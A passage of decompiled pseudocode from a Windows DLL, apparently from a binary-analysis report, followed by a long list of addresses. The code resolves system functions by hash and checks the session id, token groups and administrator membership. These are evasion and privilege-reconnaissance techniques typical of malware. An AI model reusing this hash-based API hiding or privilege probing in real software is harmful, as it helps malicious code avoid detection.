                                                                                        													E10015530(_t384);
                                                                                        												}
                                                                                        												goto L65;
                                                                                        											}
                                                                                        											__eflags = _t384 - 0xffffffff;
                                                                                        											if(_t384 != 0xffffffff) {
                                                                                        												_t240 = 0;
                                                                                        												__eflags = 0;
                                                                                        												goto L63;
                                                                                        											}
                                                                                        											goto L61;
                                                                                        										}
                                                                                        										__eflags = _t403 - 1;
                                                                                        										if(_t403 != 1) {
                                                                                        											goto L58;
                                                                                        										}
                                                                                        										E1000D020(_t431 + 0xc);
                                                                                        										__eflags =  *((char*)(_t431 + 8));
                                                                                        										if( *((char*)(_t431 + 8)) == 0) {
                                                                                        											L57:
                                                                                        											 *((intOrPtr*)(_t431 + 4)) = 0;
                                                                                        											_t190 = 5;
                                                                                        											goto L66;
                                                                                        										}
                                                                                        										_t385 =  *((intOrPtr*)(_t431 + 4));
                                                                                        										__eflags = _t385;
                                                                                        										if(_t385 == 0) {
                                                                                        											L53:
                                                                                        											_t243 = 1;
                                                                                        											L55:
                                                                                        											__eflags = _t243;
                                                                                        											if(_t243 == 0) {
                                                                                        												E10015530(_t385);
                                                                                        											}
                                                                                        											goto L57;
                                                                                        										}
                                                                                        										__eflags = _t385 - 0xffffffff;
                                                                                        										if(_t385 != 0xffffffff) {
                                                                                        											_t243 = 0;
                                                                                        											__eflags = 0;
                                                                                        											goto L55;
                                                                                        										}
                                                                                        										goto L53;
                                                                                        									}
                                                                                        									__eflags = _t403;
                                                                                        									if(_t403 != 0) {
                                                                                        										__eflags = _t403 - 1;
                                                                                        										if(_t403 == 1) {
                                                                                        											E1000D020(_t431 + 0xc);
                                                                                        											__eflags =  *((char*)(_t431 + 8));
                                                                                        											if( *((char*)(_t431 + 8)) == 0) {
                                                                                        												L122:
                                                                                        												 *((intOrPtr*)(_t431 + 4)) = 0;
                                                                                        												_t190 = 4;
                                                                                        												goto L66;
                                                                                        											}
                                                                                        											_t386 =  *((intOrPtr*)(_t431 + 4));
                                                                                        											__eflags = _t386;
                                                                                        											if(_t386 == 0) {
                                                                                        												L118:
                                                                                        												_t246 = 1;
                                                                                        												L120:
                                                                                        												__eflags = _t246;
                                                                                        												if(_t246 == 0) {
                                                                                        													E10015530(_t386);
                                                                                        												}
                                                                                        												goto L122;
                                                                                        											}
                                                                                        											__eflags = _t386 - 0xffffffff;
                                                                                        											if(_t386 != 0xffffffff) {
                                                                                        												_t246 = 0;
                                                                                        												__eflags = 0;
                                                                                        												goto L120;
                                                                                        											}
                                                                                        											goto L118;
                                                                                        										}
                                                                                        										goto L58;
                                                                                        									}
                                                                                        									E1000D020(_t431 + 0xc);
                                                                                        									__eflags =  *((char*)(_t431 + 8));
                                                                                        									if( *((char*)(_t431 + 8)) == 0) {
                                                                                        										L45:
                                                                                        										 *((intOrPtr*)(_t431 + 4)) = 0;
                                                                                        										_t190 = 3;
                                                                                        										goto L66;
                                                                                        									}
                                                                                        									_t387 =  *((intOrPtr*)(_t431 + 4));
                                                                                        									__eflags = _t387;
                                                                                        									if(_t387 == 0) {
                                                                                        										L41:
                                                                                        										_t249 = 1;
                                                                                        										L43:
                                                                                        										__eflags = _t249;
                                                                                        										if(_t249 == 0) {
                                                                                        											E10015530(_t387);
                                                                                        										}
                                                                                        										goto L45;
                                                                                        									}
                                                                                        									__eflags = _t387 - 0xffffffff;
                                                                                        									if(_t387 != 0xffffffff) {
                                                                                        										_t249 = 0;
                                                                                        										__eflags = 0;
                                                                                        										goto L43;
                                                                                        									}
                                                                                        									goto L41;
                                                                                        								}
                                                                                        								__eflags = _t403;
                                                                                        								if(_t403 != 0) {
                                                                                        									goto L58;
                                                                                        								}
                                                                                        								E1000D020(_t431 + 0xc);
                                                                                        								__eflags =  *((char*)(_t431 + 8));
                                                                                        								if( *((char*)(_t431 + 8)) == 0) {
                                                                                        									L35:
                                                                                        									 *((intOrPtr*)(_t431 + 4)) = 0;
                                                                                        									_t190 = 2;
                                                                                        									goto L66;
                                                                                        								}
                                                                                        								_t388 =  *((intOrPtr*)(_t431 + 4));
                                                                                        								__eflags = _t388;
                                                                                        								if(_t388 == 0) {
                                                                                        									L31:
                                                                                        									_t252 = 1;
                                                                                        									L33:
                                                                                        									__eflags = _t252;
                                                                                        									if(_t252 == 0) {
                                                                                        										E10015530(_t388);
                                                                                        									}
                                                                                        									goto L35;
                                                                                        								}
                                                                                        								__eflags = _t388 - 0xffffffff;
                                                                                        								if(_t388 != 0xffffffff) {
                                                                                        									_t252 = 0;
                                                                                        									__eflags = 0;
                                                                                        									goto L33;
                                                                                        								}
                                                                                        								goto L31;
                                                                                        							}
                                                                                        							E1000D020(_t431 + 0xc);
                                                                                        							__eflags =  *((char*)(_t431 + 8));
                                                                                        							if( *((char*)(_t431 + 8)) == 0) {
                                                                                        								L25:
                                                                                        								 *((intOrPtr*)(_t431 + 4)) = 0;
                                                                                        								_t190 = 1;
                                                                                        								goto L66;
                                                                                        							}
                                                                                        							_t389 =  *((intOrPtr*)(_t431 + 4));
                                                                                        							__eflags = _t389;
                                                                                        							if(_t389 == 0) {
                                                                                        								L21:
                                                                                        								_t256 = 1;
                                                                                        								L23:
                                                                                        								__eflags = _t256;
                                                                                        								if(_t256 == 0) {
                                                                                        									E10015530(_t389);
                                                                                        								}
                                                                                        								goto L25;
                                                                                        							}
                                                                                        							__eflags = _t389 - 0xffffffff;
                                                                                        							if(_t389 != 0xffffffff) {
                                                                                        								_t256 = 0;
                                                                                        								__eflags = 0;
                                                                                        								goto L23;
                                                                                        							}
                                                                                        							goto L21;
                                                                                        						} else {
                                                                                        							_t190 = 1;
                                                                                        							L66:
                                                                                        							 *((intOrPtr*)( *0x1001d1f8 + 0x24)) = _t190;
                                                                                        							_t191 = E10011054(0xffffffffffffffff);
                                                                                        							_t322 =  *0x1001d1f8;
                                                                                        							 *((char*)(_t322 + 0x29)) = _t191;
                                                                                        							 *((intOrPtr*)(_t322 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
                                                                                        							if( *_t322 >= 0x10) {
                                                                                        								__eflags = 0xffffffffffffffff;
                                                                                        								 *((intOrPtr*)( *0x1001d1f8 + 0x2c)) = E100110C8(0xffffffffffffffff);
                                                                                        								L78:
                                                                                        								_t371 = E10013044(0x10154545, 0xccc77b1, 0x10154545, 0x10154545);
                                                                                        								if(_t371 != 0) {
                                                                                        									 *_t371(_t431 + 0x164);
                                                                                        								}
                                                                                        								_t197 =  *0x1001d1f8;
                                                                                        								_t293 = _t431 + 0x178;
                                                                                        								_t411 = _t431 + 0x170;
                                                                                        								 *((short*)(_t197 + 0xe)) =  *_t293;
                                                                                        								 *((intOrPtr*)(_t197 + 0x10)) =  *((intOrPtr*)(_t293 - 0x10));
                                                                                        								 *((intOrPtr*)(_t197 + 0x14)) =  *((intOrPtr*)(_t293 - 0xc));
                                                                                        								 *((intOrPtr*)(_t197 + 0x18)) =  *_t411;
                                                                                        								 *((intOrPtr*)(_t197 + 0x1c)) =  *((intOrPtr*)(_t411 + 0x10));
                                                                                        								return _t197;
                                                                                        							}
                                                                                        							 *((intOrPtr*)(_t431 + 0x19c)) = 0;
                                                                                        							_t374 = E10013044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
                                                                                        							if(_t374 == 0) {
                                                                                        								L74:
                                                                                        								_t202 =  *0x1001d1f8;
                                                                                        								if( *((char*)(_t202 + 0x28)) == 0) {
                                                                                        									 *((intOrPtr*)(_t202 + 0x2c)) = 3;
                                                                                        								} else {
                                                                                        									 *((intOrPtr*)(_t202 + 0x2c)) = 5;
                                                                                        								}
                                                                                        								goto L78;
                                                                                        							}
                                                                                        							_push(_t431 + 0x19c);
                                                                                        							_push(8);
                                                                                        							_push(0xffffffff);
                                                                                        							if( *_t374() == 0) {
                                                                                        								_t205 = E100135C8(_t409);
                                                                                        								__eflags = _t205;
                                                                                        								if(_t205 != 0) {
                                                                                        									goto L74;
                                                                                        								}
                                                                                        							}
                                                                                        							 *((intOrPtr*)(_t431 + 0x30)) =  *((intOrPtr*)(_t431 + 0x19c));
                                                                                        							 *((char*)(_t431 + 0x34)) = 1;
                                                                                        							 *((intOrPtr*)(_t431 + 0x1a4)) = 0;
                                                                                        							_t327 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
                                                                                        							if(_t327 != 0) {
                                                                                        								_push(_t431 + 0x1a4);
                                                                                        								_push(0);
                                                                                        								_push(0);
                                                                                        								_push(1);
                                                                                        								_push( *((intOrPtr*)(_t431 + 0x1ac)));
                                                                                        								if( *_t327() == 0) {
                                                                                        									E100135C8(_t409);
                                                                                        								}
                                                                                        							}
                                                                                        							_t208 =  *((intOrPtr*)(_t431 + 0x1a4));
                                                                                        							if( *((intOrPtr*)(_t431 + 0x1a4)) != 0) {
                                                                                        								E1000F5A8(_t431 + 0x18c, _t208);
                                                                                        								_t413 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
                                                                                        								__eflags = _t413;
                                                                                        								if(_t413 == 0) {
                                                                                        									L134:
                                                                                        									E1000F678(_t431 + 0x188);
                                                                                        									goto L72;
                                                                                        								}
                                                                                        								_t214 = E1000F4E0(_t431 + 0x18c, 0);
                                                                                        								_t215 = E1000F4F0(_t431 + 0x188);
                                                                                        								_t217 =  *_t413( *((intOrPtr*)(_t431 + 0x1ac)), 1, _t214, _t215, _t431 + 0x1a4);
                                                                                        								__eflags = _t217;
                                                                                        								if(_t217 == 0) {
                                                                                        									_t218 = E100135C8(_t413);
                                                                                        									__eflags = _t218;
                                                                                        									if(_t218 != 0) {
                                                                                        										goto L134;
                                                                                        									}
                                                                                        								}
                                                                                        								_t425 = E1000F4E0(_t431 + 0x18c, 0);
                                                                                        								E1000DF84(_t431 + 0x1b4, 0);
                                                                                        								 *((intOrPtr*)(_t431 + 0x1ac)) = 0;
                                                                                        								_t379 = E10013044(0x8b9d0da7, 0x628b2cfa, 0x8b9d0da7, 0x8b9d0da7);
                                                                                        								__eflags = _t379;
                                                                                        								if(_t379 != 0) {
                                                                                        									 *_t379( *_t425, _t431 + 0x1ac);
                                                                                        								}
                                                                                        								E1000DFF8(_t431 + 0x1b4,  *((intOrPtr*)(_t431 + 0x1ac)));
                                                                                        								_t225 = E10013044(0x10154545, 0x44fb2dcc, 0x10154545, 0x10154545);
                                                                                        								__eflags = _t225;
                                                                                        								if(_t225 != 0) {
                                                                                        									_push( *((intOrPtr*)(_t431 + 0x1ac)));
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        								}
                                                                                        								E1000E0A4(_t431 + 0x1b8 - 8, _t431 + 0x1b8);
                                                                                        								_t427 = E10014FD4( *((intOrPtr*)(_t431 + 0x1b8)), E1000E8D4( *((intOrPtr*)(_t431 + 0x1b8)), 0x7fffffff));
                                                                                        								E1000DFDC(_t431 + 0x1b8);
                                                                                        								E1000DFDC(_t431 + 0x1b0);
                                                                                        								E1000F678(_t431 + 0x188);
                                                                                        								__eflags =  *((char*)(_t431 + 0x34));
                                                                                        								if( *((char*)(_t431 + 0x34)) != 0) {
                                                                                        									E1000BB88(_t431 + 0x30);
                                                                                        								}
                                                                                        								__eflags = _t427 - 0x6df4cf7;
                                                                                        								if(_t427 != 0x6df4cf7) {
                                                                                        									goto L74;
                                                                                        								} else {
                                                                                        									 *((intOrPtr*)( *0x1001d1f8 + 0x2c)) = 6;
                                                                                        									goto L78;
                                                                                        								}
                                                                                        							} else {
                                                                                        								L72:
                                                                                        								if( *((char*)(_t431 + 0x34)) != 0) {
                                                                                        									E1000BB88(_t431 + 0x30);
                                                                                        								}
                                                                                        								goto L74;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t431 + 0x198);
                                                                                        					_push(8);
                                                                                        					_push(0xffffffff);
                                                                                        					if( *_t365() == 0) {
                                                                                        						_t261 = E100135C8(_t406);
                                                                                        						__eflags = _t261;
                                                                                        						if(_t261 != 0) {
                                                                                        							goto L12;
                                                                                        						}
                                                                                        					}
                                                                                        					 *((intOrPtr*)(_t431 + 0x14)) =  *((intOrPtr*)(_t431 + 0x198));
                                                                                        					 *((char*)(_t431 + 0x18)) = 1;
                                                                                        					 *((intOrPtr*)(_t431 + 0x1a0)) = 0;
                                                                                        					_t349 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
                                                                                        					if(_t349 != 0) {
                                                                                        						_push(_t431 + 0x1a0);
                                                                                        						_push(0);
                                                                                        						_push(0);
                                                                                        						_push(2);
                                                                                        						_push( *((intOrPtr*)(_t431 + 0x1a8)));
                                                                                        						if( *_t349() == 0) {
                                                                                        							E100135C8(_t406);
                                                                                        						}
                                                                                        					}
                                                                                        					_t264 =  *((intOrPtr*)(_t431 + 0x1a0));
                                                                                        					if( *((intOrPtr*)(_t431 + 0x1a0)) != 0) {
                                                                                        						E1000F5A8(_t431 + 0x3c, _t264);
                                                                                        						_t409 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
                                                                                        						__eflags = _t409;
                                                                                        						if(_t409 == 0) {
                                                                                        							L108:
                                                                                        							E1000F678(_t431 + 0x38);
                                                                                        							goto L10;
                                                                                        						}
                                                                                        						_t270 = E1000F4E0(_t431 + 0x3c, 0);
                                                                                        						_t271 = E1000F4F0(_t431 + 0x38);
                                                                                        						_t273 =  *_t409( *((intOrPtr*)(_t431 + 0x1a8)), 2, _t270, _t271, _t431 + 0x1a0);
                                                                                        						__eflags = _t273;
                                                                                        						if(_t273 == 0) {
                                                                                        							_t274 = E100135C8(_t409);
                                                                                        							__eflags = _t274;
                                                                                        							if(_t274 != 0) {
                                                                                        								goto L108;
                                                                                        							}
                                                                                        						}
                                                                                        						_t429 = E1000F4E0(_t431 + 0x3c, 0);
                                                                                        						 *((intOrPtr*)(_t431 + 0x1d8 - 0x30)) = 0;
                                                                                        						asm("movsd");
                                                                                        						asm("movsb");
                                                                                        						asm("movsb");
                                                                                        						_t409 = E10013044(0x8b9d0da7, 0xbdc0a291, 0x8b9d0da7, 0x8b9d0da7);
                                                                                        						__eflags = _t409;
                                                                                        						if(_t409 == 0) {
                                                                                        							goto L108;
                                                                                        						}
                                                                                        						_t278 = _t431 + 0x1a8;
                                                                                        						_t279 =  *_t409(_t278 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t278);
                                                                                        						__eflags = _t279;
                                                                                        						if(_t279 == 0) {
                                                                                        							_t280 = E100135C8(_t409);
                                                                                        							__eflags = _t280;
                                                                                        							if(_t280 != 0) {
                                                                                        								goto L108;
                                                                                        							}
                                                                                        						}
                                                                                        						_t405 =  *((intOrPtr*)(_t431 + 0x1a8));
                                                                                        						__eflags =  *_t429;
                                                                                        						if( *_t429 <= 0) {
                                                                                        							L102:
                                                                                        							__eflags = _t405;
                                                                                        							if(_t405 == 0) {
                                                                                        								L104:
                                                                                        								_t395 = 1;
                                                                                        								L106:
                                                                                        								__eflags = _t395;
                                                                                        								if(_t395 == 0) {
                                                                                        									E10010FF8(_t405, _t409, _t405);
                                                                                        								}
                                                                                        								goto L108;
                                                                                        							}
                                                                                        							__eflags = _t405 - 0xffffffff;
                                                                                        							if(_t405 != 0xffffffff) {
                                                                                        								_t395 = 0;
                                                                                        								__eflags = 0;
                                                                                        								goto L106;
                                                                                        							}
                                                                                        							goto L104;
                                                                                        						}
                                                                                        						_t415 = 0;
                                                                                        						__eflags = 0;
                                                                                        						do {
                                                                                        							_t284 = E10013044(0x8b9d0da7, 0x2ae47d4a, 0x8b9d0da7, 0x8b9d0da7);
                                                                                        							__eflags = _t284;
                                                                                        							if(_t284 == 0) {
                                                                                        								goto L101;
                                                                                        							}
                                                                                        							_push( *((intOrPtr*)(_t429 + 4 + _t415 * 8)));
                                                                                        							_push( *((intOrPtr*)(_t431 + 0x1ac)));
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							__eflags = _t284;
                                                                                        							if(_t284 == 0) {
                                                                                        								goto L101;
                                                                                        							}
                                                                                        							__eflags = _t405;
                                                                                        							if(_t405 == 0) {
                                                                                        								L93:
                                                                                        								_t397 = 1;
                                                                                        								L95:
                                                                                        								__eflags = _t397;
                                                                                        								if(_t397 == 0) {
                                                                                        									E10010FF8(_t405, _t415, _t405);
                                                                                        								}
                                                                                        								E1000F678(_t431 + 0x38);
                                                                                        								__eflags =  *((char*)(_t431 + 0x18));
                                                                                        								if( *((char*)(_t431 + 0x18)) != 0) {
                                                                                        									E1000BB88(_t431 + 0x14);
                                                                                        									_push( *((intOrPtr*)(_t397 - 0x50916ff)));
                                                                                        								}
                                                                                        								_t366 = 1;
                                                                                        								goto L13;
                                                                                        							}
                                                                                        							__eflags = _t405 - 0xffffffff;
                                                                                        							if(_t405 != 0xffffffff) {
                                                                                        								_t397 = 0;
                                                                                        								__eflags = 0;
                                                                                        								goto L95;
                                                                                        							}
                                                                                        							goto L93;
                                                                                        							L101:
                                                                                        							_t415 = _t415 + 1;
                                                                                        							__eflags = _t415 -  *_t429;
                                                                                        						} while (_t415 <  *_t429);
                                                                                        						goto L102;
                                                                                        					}
                                                                                        					L10:
                                                                                        					if( *((char*)(_t431 + 0x18)) != 0) {
                                                                                        						E1000BB88(_t431 + 0x14);
                                                                                        					}
                                                                                        					goto L12;
                                                                                        				} else {
                                                                                        					return _t156;
                                                                                        				}
                                                                                        			}



































































                                                                                        0x10010763
                                                                                        0x10010765
                                                                                        0x1001076c
                                                                                        0x10010feb
                                                                                        0x10010ff1
                                                                                        0x10010ff1
                                                                                        0x10010776
                                                                                        0x10010782
                                                                                        0x1001078e
                                                                                        0x10010793
                                                                                        0x100107a0
                                                                                        0x100107b1
                                                                                        0x100107b3
                                                                                        0x100107b4
                                                                                        0x100107b5
                                                                                        0x100107b5
                                                                                        0x100107b6
                                                                                        0x100107ba
                                                                                        0x100107be
                                                                                        0x100107c3
                                                                                        0x100107c6
                                                                                        0x100107cc
                                                                                        0x100107e6
                                                                                        0x100107ed
                                                                                        0x100107f0
                                                                                        0x100107f3
                                                                                        0x100107f5
                                                                                        0x10010801
                                                                                        0x1001080e
                                                                                        0x1001081b
                                                                                        0x1001081f
                                                                                        0x100108ab
                                                                                        0x100108ab
                                                                                        0x100108ad
                                                                                        0x100108b1
                                                                                        0x100108bc
                                                                                        0x100108d2
                                                                                        0x100108d5
                                                                                        0x100108d5
                                                                                        0x100108d9
                                                                                        0x100108e2
                                                                                        0x100108e7
                                                                                        0x100108e7
                                                                                        0x100108e9
                                                                                        0x100108fa
                                                                                        0x1001091c
                                                                                        0x1001091e
                                                                                        0x1001091f
                                                                                        0x10010923
                                                                                        0x10010923
                                                                                        0x1001092c
                                                                                        0x10010938
                                                                                        0x10010941
                                                                                        0x10010957
                                                                                        0x10010967
                                                                                        0x1001096c
                                                                                        0x10010970
                                                                                        0x10010975
                                                                                        0x10010977
                                                                                        0x100109c7
                                                                                        0x100109dc
                                                                                        0x100109e0
                                                                                        0x100109e5
                                                                                        0x100109f6
                                                                                        0x10010a0b
                                                                                        0x10010a0f
                                                                                        0x10010a14
                                                                                        0x10010a16
                                                                                        0x10010a5d
                                                                                        0x10010a60
                                                                                        0x10010aae
                                                                                        0x10010ab1
                                                                                        0x10010af2
                                                                                        0x10010af6
                                                                                        0x10010afb
                                                                                        0x10010b00
                                                                                        0x10010b1f
                                                                                        0x10010b1f
                                                                                        0x10010b1f
                                                                                        0x10010b21
                                                                                        0x00000000
                                                                                        0x10010b21
                                                                                        0x10010b02
                                                                                        0x10010b06
                                                                                        0x10010b08
                                                                                        0x10010b0f
                                                                                        0x10010b0f
                                                                                        0x10010b15
                                                                                        0x10010b15
                                                                                        0x10010b17
                                                                                        0x10010b1a
                                                                                        0x10010b1a
                                                                                        0x00000000
                                                                                        0x10010b17
                                                                                        0x10010b0a
                                                                                        0x10010b0d
                                                                                        0x10010b13
                                                                                        0x10010b13
                                                                                        0x00000000
                                                                                        0x10010b13
                                                                                        0x00000000
                                                                                        0x10010b0d
                                                                                        0x10010ab3
                                                                                        0x10010ab6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10010abc
                                                                                        0x10010ac1
                                                                                        0x10010ac6
                                                                                        0x10010ae5
                                                                                        0x10010ae5
                                                                                        0x10010aef
                                                                                        0x00000000
                                                                                        0x10010aef
                                                                                        0x10010ac8
                                                                                        0x10010acc
                                                                                        0x10010ace
                                                                                        0x10010ad5
                                                                                        0x10010ad5
                                                                                        0x10010adb
                                                                                        0x10010adb
                                                                                        0x10010add
                                                                                        0x10010ae0
                                                                                        0x10010ae0
                                                                                        0x00000000
                                                                                        0x10010add
                                                                                        0x10010ad0
                                                                                        0x10010ad3
                                                                                        0x10010ad9
                                                                                        0x10010ad9
                                                                                        0x00000000
                                                                                        0x10010ad9
                                                                                        0x00000000
                                                                                        0x10010ad3
                                                                                        0x10010a62
                                                                                        0x10010a64
                                                                                        0x10010aa3
                                                                                        0x10010aa6
                                                                                        0x10010e18
                                                                                        0x10010e1d
                                                                                        0x10010e22
                                                                                        0x10010e41
                                                                                        0x10010e41
                                                                                        0x10010e4b
                                                                                        0x00000000
                                                                                        0x10010e4b
                                                                                        0x10010e24
                                                                                        0x10010e28
                                                                                        0x10010e2a
                                                                                        0x10010e31
                                                                                        0x10010e31
                                                                                        0x10010e37
                                                                                        0x10010e37
                                                                                        0x10010e39
                                                                                        0x10010e3c
                                                                                        0x10010e3c
                                                                                        0x00000000
                                                                                        0x10010e39
                                                                                        0x10010e2c
                                                                                        0x10010e2f
                                                                                        0x10010e35
                                                                                        0x10010e35
                                                                                        0x00000000
                                                                                        0x10010e35
                                                                                        0x00000000
                                                                                        0x10010e2f
                                                                                        0x00000000
                                                                                        0x10010aac
                                                                                        0x10010a6a
                                                                                        0x10010a6f
                                                                                        0x10010a74
                                                                                        0x10010a93
                                                                                        0x10010a93
                                                                                        0x10010a9d
                                                                                        0x00000000
                                                                                        0x10010a9d
                                                                                        0x10010a76
                                                                                        0x10010a7a
                                                                                        0x10010a7c
                                                                                        0x10010a83
                                                                                        0x10010a83
                                                                                        0x10010a89
                                                                                        0x10010a89
                                                                                        0x10010a8b
                                                                                        0x10010a8e
                                                                                        0x10010a8e
                                                                                        0x00000000
                                                                                        0x10010a8b
                                                                                        0x10010a7e
                                                                                        0x10010a81
                                                                                        0x10010a87
                                                                                        0x10010a87
                                                                                        0x00000000
                                                                                        0x10010a87
                                                                                        0x00000000
                                                                                        0x10010a81
                                                                                        0x10010a18
                                                                                        0x10010a1a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10010a24
                                                                                        0x10010a29
                                                                                        0x10010a2e
                                                                                        0x10010a4d
                                                                                        0x10010a4d
                                                                                        0x10010a57
                                                                                        0x00000000
                                                                                        0x10010a57
                                                                                        0x10010a30
                                                                                        0x10010a34
                                                                                        0x10010a36
                                                                                        0x10010a3d
                                                                                        0x10010a3d
                                                                                        0x10010a43
                                                                                        0x10010a43
                                                                                        0x10010a45
                                                                                        0x10010a48
                                                                                        0x10010a48
                                                                                        0x00000000
                                                                                        0x10010a45
                                                                                        0x10010a38
                                                                                        0x10010a3b
                                                                                        0x10010a41
                                                                                        0x10010a41
                                                                                        0x00000000
                                                                                        0x10010a41
                                                                                        0x00000000
                                                                                        0x10010a3b
                                                                                        0x1001097d
                                                                                        0x10010982
                                                                                        0x10010987
                                                                                        0x100109a6
                                                                                        0x100109a6
                                                                                        0x100109b0
                                                                                        0x00000000
                                                                                        0x100109b0
                                                                                        0x10010989
                                                                                        0x1001098d
                                                                                        0x1001098f
                                                                                        0x10010996
                                                                                        0x10010996
                                                                                        0x1001099c
                                                                                        0x1001099c
                                                                                        0x1001099e
                                                                                        0x100109a1
                                                                                        0x100109a1
                                                                                        0x00000000
                                                                                        0x1001099e
                                                                                        0x10010991
                                                                                        0x10010994
                                                                                        0x1001099a
                                                                                        0x1001099a
                                                                                        0x00000000
                                                                                        0x1001099a
                                                                                        0x00000000
                                                                                        0x100108be
                                                                                        0x100108c0
                                                                                        0x10010b25
                                                                                        0x10010b2a
                                                                                        0x10010b2d
                                                                                        0x10010b32
                                                                                        0x10010b34
                                                                                        0x10010b49
                                                                                        0x10010b4c
                                                                                        0x10010c1a
                                                                                        0x10010c22
                                                                                        0x10010c25
                                                                                        0x10010c36
                                                                                        0x10010c3a
                                                                                        0x10010c44
                                                                                        0x10010c44
                                                                                        0x10010c46
                                                                                        0x10010c48
                                                                                        0x10010c57
                                                                                        0x10010c63
                                                                                        0x10010c67
                                                                                        0x10010c6a
                                                                                        0x10010c6d
                                                                                        0x10010c70
                                                                                        0x00000000
                                                                                        0x10010c70
                                                                                        0x10010b5c
                                                                                        0x10010b6e
                                                                                        0x10010b72
                                                                                        0x10010bfe
                                                                                        0x10010bfe
                                                                                        0x10010c04
                                                                                        0x10010c0f
                                                                                        0x10010c06
                                                                                        0x10010c06
                                                                                        0x10010c06
                                                                                        0x00000000
                                                                                        0x10010c04
                                                                                        0x10010b7f
                                                                                        0x10010b80
                                                                                        0x10010b82
                                                                                        0x10010b88
                                                                                        0x10010fd7
                                                                                        0x10010fdc
                                                                                        0x10010fde
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10010fe4
                                                                                        0x10010b9f
                                                                                        0x10010ba3
                                                                                        0x10010ba8
                                                                                        0x10010bba
                                                                                        0x10010bbe
                                                                                        0x10010bc9
                                                                                        0x10010bca
                                                                                        0x10010bcb
                                                                                        0x10010bcc
                                                                                        0x10010bce
                                                                                        0x10010bd9
                                                                                        0x10010e51
                                                                                        0x10010e51
                                                                                        0x10010bd9
                                                                                        0x10010bdf
                                                                                        0x10010be8
                                                                                        0x10010e63
                                                                                        0x10010e79
                                                                                        0x10010e7b
                                                                                        0x10010e7d
                                                                                        0x10010fb8
                                                                                        0x10010fbf
                                                                                        0x00000000
                                                                                        0x10010fbf
                                                                                        0x10010e8c
                                                                                        0x10010e9a
                                                                                        0x10010eb4
                                                                                        0x10010eb6
                                                                                        0x10010eb8
                                                                                        0x10010fc9
                                                                                        0x10010fce
                                                                                        0x10010fd0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10010fd2
                                                                                        0x10010ecc
                                                                                        0x10010ed7
                                                                                        0x10010ee6
                                                                                        0x10010ef8
                                                                                        0x10010efa
                                                                                        0x10010efc
                                                                                        0x10010f09
                                                                                        0x10010f09
                                                                                        0x10010f19
                                                                                        0x10010f2a
                                                                                        0x10010f2f
                                                                                        0x10010f31
                                                                                        0x10010f33
                                                                                        0x10010f3a
                                                                                        0x10010f3b
                                                                                        0x10010f3b
                                                                                        0x10010f47
                                                                                        0x10010f68
                                                                                        0x10010f71
                                                                                        0x10010f7d
                                                                                        0x10010f89
                                                                                        0x10010f8e
                                                                                        0x10010f93
                                                                                        0x10010f99
                                                                                        0x10010f99
                                                                                        0x10010f9e
                                                                                        0x10010fa4
                                                                                        0x00000000
                                                                                        0x10010faa
                                                                                        0x10010fac
                                                                                        0x00000000
                                                                                        0x10010fac
                                                                                        0x10010bee
                                                                                        0x10010bee
                                                                                        0x10010bf3
                                                                                        0x10010bf9
                                                                                        0x10010bf9
                                                                                        0x00000000
                                                                                        0x10010bf3
                                                                                        0x10010be8
                                                                                        0x100108bc
                                                                                        0x1001082c
                                                                                        0x1001082d
                                                                                        0x1001082f
                                                                                        0x10010835
                                                                                        0x10010e02
                                                                                        0x10010e07
                                                                                        0x10010e09
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10010e0f
                                                                                        0x1001084c
                                                                                        0x10010850
                                                                                        0x10010855
                                                                                        0x10010867
                                                                                        0x1001086b
                                                                                        0x10010876
                                                                                        0x10010877
                                                                                        0x10010878
                                                                                        0x10010879
                                                                                        0x1001087b
                                                                                        0x10010886
                                                                                        0x10010c7e
                                                                                        0x10010c7e
                                                                                        0x10010886
                                                                                        0x1001088c
                                                                                        0x10010895
                                                                                        0x10010c8d
                                                                                        0x10010ca3
                                                                                        0x10010ca5
                                                                                        0x10010ca7
                                                                                        0x10010dd8
                                                                                        0x10010ddc
                                                                                        0x00000000
                                                                                        0x10010ddc
                                                                                        0x10010cb3
                                                                                        0x10010cbe
                                                                                        0x10010cd8
                                                                                        0x10010cda
                                                                                        0x10010cdc
                                                                                        0x10010df4
                                                                                        0x10010df9
                                                                                        0x10010dfb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10010dfd
                                                                                        0x10010ced
                                                                                        0x10010cfb
                                                                                        0x10010d02
                                                                                        0x10010d03
                                                                                        0x10010d04
                                                                                        0x10010d16
                                                                                        0x10010d18
                                                                                        0x10010d1a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10010d22
                                                                                        0x10010d3d
                                                                                        0x10010d3f
                                                                                        0x10010d41
                                                                                        0x10010de6
                                                                                        0x10010deb
                                                                                        0x10010ded
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10010def
                                                                                        0x10010d47
                                                                                        0x10010d4e
                                                                                        0x10010d52
                                                                                        0x10010dbd
                                                                                        0x10010dbd
                                                                                        0x10010dbf
                                                                                        0x10010dc6
                                                                                        0x10010dc6
                                                                                        0x10010dcc
                                                                                        0x10010dcc
                                                                                        0x10010dce
                                                                                        0x10010dd3
                                                                                        0x10010dd3
                                                                                        0x00000000
                                                                                        0x10010dce
                                                                                        0x10010dc1
                                                                                        0x10010dc4
                                                                                        0x10010dca
                                                                                        0x10010dca
                                                                                        0x00000000
                                                                                        0x10010dca
                                                                                        0x00000000
                                                                                        0x10010dc4
                                                                                        0x10010d54
                                                                                        0x10010d54
                                                                                        0x10010d56
                                                                                        0x10010d62
